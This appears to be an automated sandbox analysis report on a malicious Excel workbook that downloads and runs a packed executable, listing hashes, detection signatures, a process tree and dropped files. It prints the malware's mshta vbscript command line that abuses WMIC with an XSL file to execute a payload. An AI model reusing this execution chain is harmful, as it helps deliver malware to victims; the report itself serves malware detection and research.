Analysis

  • max time kernel
    147s
  • max time network
    158s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    26-07-2021 16:34

General

  • Target

    B6B2406B.xlsb

  • Size

    399KB

  • MD5

    9746382b9bd6beec5889ce3256dea9ef

  • SHA1

    1d12104d6309d98565193337eb546943eaeea959

  • SHA256

    205f42a518914e75620077ed79b9016b48f657d305ef892c6633fa6397463680

  • SHA512

    cfcfa74c464fd67941f35711ec602256fe8fed0ae9b49634ef9d9794f5f92e55f765a4479dcb71241731df0d149a20b2064e6bba5b8bc3f5f8c9599ac152557c

Malware Config

Signatures

  • suricata: ET MALWARE Maldoc Retrieving Payload 2021-07-06
  • CryptOne packer 2 IoCs

    Detects CryptOne packer defined in NCC blogpost.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\B6B2406B.xlsb"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3932
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2892
    • \??\c:\windows\system32\mshta.EXE
      c:\windows\system32\mshta.EXE vbscript:Execute("set osh = CreateObject(""Wscript.Shell""):osh.Run(""wmic os get /format:"" & Chr(34) & osh.ExpandEnvironmentStrings(""C:\ProgramData"") & ""\\qOtherSessionChanges.xsl"" & Chr(34)),0:close")
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1988
      • C:\Windows\System32\wbem\WMIC.exe
        "C:\Windows\System32\wbem\WMIC.exe" os get /format:"C:\ProgramData\\qOtherSessionChanges.xsl"
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:504
        • C:\Windows\Temp\sr2mq.exe
          "C:\Windows\Temp\sr2mq.exe"
          3⤵
          • Executes dropped EXE
          PID:852

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    System Information Discovery

    3
    T1082

    Query Registry

    2
    T1012

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\qOtherSessionChanges.xsl
      MD5

      fde8ba6b6f6f06695ba8e05b7b76f065

      SHA1

      30c61a9ad4f6bc33a2ebe5b3a5615c16b478ec1a

      SHA256

      abf29b8f7c858fcdabf46347fcdb62f497910f7360452ecf6a144214949b1157

      SHA512

      10c60dfddbc31c1d70fddf189d88d3bbf689baa28b065d4a589b7ef2911ef04d5238cb581e89e478157ba8c2d6b812f09c8c1ebc62098a0d64b8181b35d4f28f

    • C:\Windows\Temp\sr2mq.exe
      MD5

      9a2e1bb9ad6f1ccfeaa4c2c55637ae3b

      SHA1

      d42d55cab8637f847efdc1a01bcd5bb2d4668b7d

      SHA256

      b012145b80d5176d73ed67924be9b1290d7920f05bf436f37deca4799b6d88b6

      SHA512

      c8233171f957979936ea517dcabb3732e54b1cc19e89853d198b48c36f9609d2d8d0a0e75267a63162bd7d40371d22fbc62084441eaaec4d8670a5c2d985d1a6

    • C:\Windows\Temp\sr2mq.exe
      MD5

      9a2e1bb9ad6f1ccfeaa4c2c55637ae3b

      SHA1

      d42d55cab8637f847efdc1a01bcd5bb2d4668b7d

      SHA256

      b012145b80d5176d73ed67924be9b1290d7920f05bf436f37deca4799b6d88b6

      SHA512

      c8233171f957979936ea517dcabb3732e54b1cc19e89853d198b48c36f9609d2d8d0a0e75267a63162bd7d40371d22fbc62084441eaaec4d8670a5c2d985d1a6

    • memory/504-331-0x0000000000000000-mapping.dmp
    • memory/852-333-0x0000000000000000-mapping.dmp
    • memory/2892-260-0x0000000000000000-mapping.dmp
    • memory/3932-118-0x00007FF9CF580000-0x00007FF9CF590000-memory.dmp
      Filesize

      64KB

    • memory/3932-123-0x00000116A1F10000-0x00000116A3E05000-memory.dmp
      Filesize

      31.0MB

    • memory/3932-122-0x00007FF9EFDA0000-0x00007FF9F0E8E000-memory.dmp
      Filesize

      16.9MB

    • memory/3932-326-0x00007FF9CF580000-0x00007FF9CF590000-memory.dmp
      Filesize

      64KB

    • memory/3932-327-0x00007FF9CF580000-0x00007FF9CF590000-memory.dmp
      Filesize

      64KB

    • memory/3932-328-0x00007FF9CF580000-0x00007FF9CF590000-memory.dmp
      Filesize

      64KB

    • memory/3932-329-0x00007FF9CF580000-0x00007FF9CF590000-memory.dmp
      Filesize

      64KB

    • memory/3932-121-0x00007FF9CF580000-0x00007FF9CF590000-memory.dmp
      Filesize

      64KB

    • memory/3932-114-0x00007FF7F58C0000-0x00007FF7F8E76000-memory.dmp
      Filesize

      53.7MB

    • memory/3932-117-0x00007FF9CF580000-0x00007FF9CF590000-memory.dmp
      Filesize

      64KB

    • memory/3932-116-0x00007FF9CF580000-0x00007FF9CF590000-memory.dmp
      Filesize

      64KB

    • memory/3932-115-0x00007FF9CF580000-0x00007FF9CF590000-memory.dmp
      Filesize

      64KB